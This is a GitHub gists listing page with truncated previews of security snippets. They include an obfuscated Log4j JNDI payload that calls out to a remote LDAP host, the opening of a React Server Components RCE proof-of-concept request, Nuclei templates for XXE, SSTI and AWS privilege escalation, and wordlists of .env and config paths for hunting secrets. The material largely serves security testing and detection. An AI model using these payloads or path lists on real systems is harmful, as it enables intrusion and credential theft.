Skip to content

Instantly share code, notes, and snippets.

View emadshanab's full-sized avatar
🏠
Working from home

Emad Shanab emadshanab

🏠
Working from home
710 followers · 274 following
View GitHub Profile
@simokohonen
simokohonen / gist:c7b21f3d47e2e45613fec36f535547a1
Created December 12, 2025 07:08
cisco_log4j_looking_things
GET /${${1:-j}${fg:7:-n}${0:an:3d7:-d}${8l:-i}${36jv:co9p:-:}${a4:5p2:-l}${7c2r:hrw:-d}${5l6x:-a}${i:-p}${ml:7:fodr:-:}${93:-/}${sbt3:xl:-/}${vsfp:-P}${c:dr76:-A}${x8:mnft:8nt6:-l}${pntj:nt9:-0}${k6:-c}${rv:pbuh:--}${${qdcr:5e:f:-s}${rj9:-y}${vag6:np1:m1:-s}${bop:-:}${ku5x:-j}${y3:-a}${j:-v}${h7j8:-a}${3hg:5a:y4s:-.}${f:fij:6:-v}${ql:-e}${i0ew:kfju:vyfb:-r}${0q:1:hdql:-s}${zg:o8a:-i}${jrp:ht0:-o}${jo9:-n}}${d:-.}${r:7:-8}${34tz:zbp:-b}${v7g:-3}${g6x:-6}${umdk:-1}${6zgi:-6}${gek:-d}${4p0:eq7z:yv1:-3}${4v:m9l:s3:-5}${e:-e}${3g0u:8:cbo:-1}${sxv:03hs:mh:-9}${7klx:2u:-f}${x:pb:-d}${1e:i2gk:y:-8}${9cpw:n0ap:-2}${qm:3i:-d}${9i:nu1:-f}${kwh:07p:89j:-0}${h8z:a:-f}${o:v0jg:o3v:-4}${be8z:q3v:bt:-0}${4:q14:-6}${n:o:-0}${c:ucfk:o06p:-1}${6:-2}${n4:-2}${w0u:-f}${oc4h:n:g42:-5}${nciz:2kb:rz1l:-7}${0wl:ux8:-c}${z1:-8}${16s:on:8s:-3}${d:hzb:-3}${a:-8}${ki:qk1:-f}${pnk:d:-d}${ovai:-9}${d:-0}${orxs:j:-e}${cw:a:-2}${q:ml:-a}${im:towb:6c:-.}${h:794c:-d}${92op:7rz:-n}${189j:-s}${85t:p4k:--}${6:ph:-e}${s5:-x}${r9iy:-f}${w:i:iufr:-i
@maple3142
maple3142 / CVE-2025-55182.http
Last active January 5, 2026 05:03
CVE-2025-55182 React Server Components RCE POC
POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 459
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
@bolhasec
bolhasec / poc-CVE-2025-58360.yaml
Created November 26, 2025 11:23
POC for CVE-2025-58360
id: geoserver-wms-sld-xxe
info:
name: GeoServer WMS SLD XXE Detection
author: bolhasec
severity: medium
description: |
Attempts to exploit an XXE vulnerability via a StyledLayerDescriptor (SLD)
in a WMS GetMap POST request. A secure GeoServer instance should reject
entity resolution and return an error like "Entity resolution disallowed for file".
@simokohonen
simokohonen / gist:d9b24e5066180c79ce4be1761bb9fa9e
Created October 9, 2025 12:34
.env urls enumeration
/.env
/.env.production
/.env.www
/.env-release.env
/example/.env
/.env
/client/.env.production
/node/.env_example
/.env.test
/.env.local
@reconeer
reconeer / gist:5f20ad1150f8044cac80360a19a5a48a
Created October 3, 2025 02:54
telekom.de 600 more subdomains than https://github.com/projectdiscovery/subfinder and https://subdomainfinder.c99.nl/
Reconeer lists 600 more subdomains than https://subdomainfinder.c99.nl/scans/2025-09-28/telekom.de and basic subfinder https://github.com/projectdiscovery/subfinder for telekom.de https://www.reconeer.com/domain/telekom.de https://github.com/reconeer/reconeer
1.ntp.time.telekom.de
3.ntp.time.telekom.de
2.ntp.time.telekom.de
4.ntp.time.telekom.de
5.ntp.time.telekom.de
admin.pfau.telekom.de
adsl-vp.telekom.de
@simokohonen
simokohonen / gist:1fda088ba349f993922699fc1acf4d5c
Created August 15, 2025 08:49
185.177.72.50
/Node.js/JavaScript
/.git/hooks/pre-commit
/.env.json
/.cloudfront/keys.json
/.git/refs/stash
/admin/.env.old
/.docker/.env
/.env.docker.dev
/api/aws/s3
/admin/wp-config.php.old
@bolhasec
bolhasec / CVE-2025-53833.yaml
Last active October 12, 2025 00:37
Nuclei Template for CVE-2025-53833
id: CVE-2025-53833
info:
name: LaRecipe is vulnerable to Server-Side Template Injection attacks
author: sushicomabacate
severity: critical
description: |
LaRecipe is an application that allows users to create documentation with Markdown inside a Laravel app. Versions prior to 2.8.1 are vulnerable to Server-Side Template Injection (SSTI), which could potentially lead to Remote Code Execution (RCE) in vulnerable configurations. Attackers could execute arbitrary commands on the server, access sensitive environment variables, and/or escalate access depending on server configuration. Users are strongly advised to upgrade to version v2.8.1 or later to receive a patch.
reference:
- https://www.cve.org/CVERecord?id=CVE-2025-53833
@calmhavoc
calmhavoc / scanning.md
Last active January 22, 2026 01:18
Note 1
# Note, to speed scans up, set a scan variable here and add it to nmap lines where desired, eg:

nmap_defaults="--max-rtt-timeout 100ms --min-hostgroup 64 --min-rate 1000 --max-retries 2"

# nmap -Pn -n -sS -p 21-23,111,137,445,80,443 -iL target_scope.txt -oG $projectdir/nmap/$custid.quickscan-tcp.gnmap $nmap_defaults
Note 2
@nullenc0de
nullenc0de / aws.yaml
Last active October 11, 2025 06:15
id: aws-iam-privilege-escalation
info:
name: AWS IAM Privilege Escalation Vectors
author: nullenc0de
severity: critical
description: |
Detects AWS IAM policies, credentials, metadata, and configurations that allow privilege escalation paths.
Covers exposed credentials, overly permissive IAM policies, misconfigured metadata services, vulnerable role assumptions, and user-data scripts.
reference:
@nullenc0de
nullenc0de / huge_config.yaml
Created June 3, 2025 13:30
id: sensitive-credential-files
info:
name: Sensitive Credential File Discovery
author: security-researcher
severity: high
description: Discovers exposed files containing credentials, API keys, passwords, and other sensitive data
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5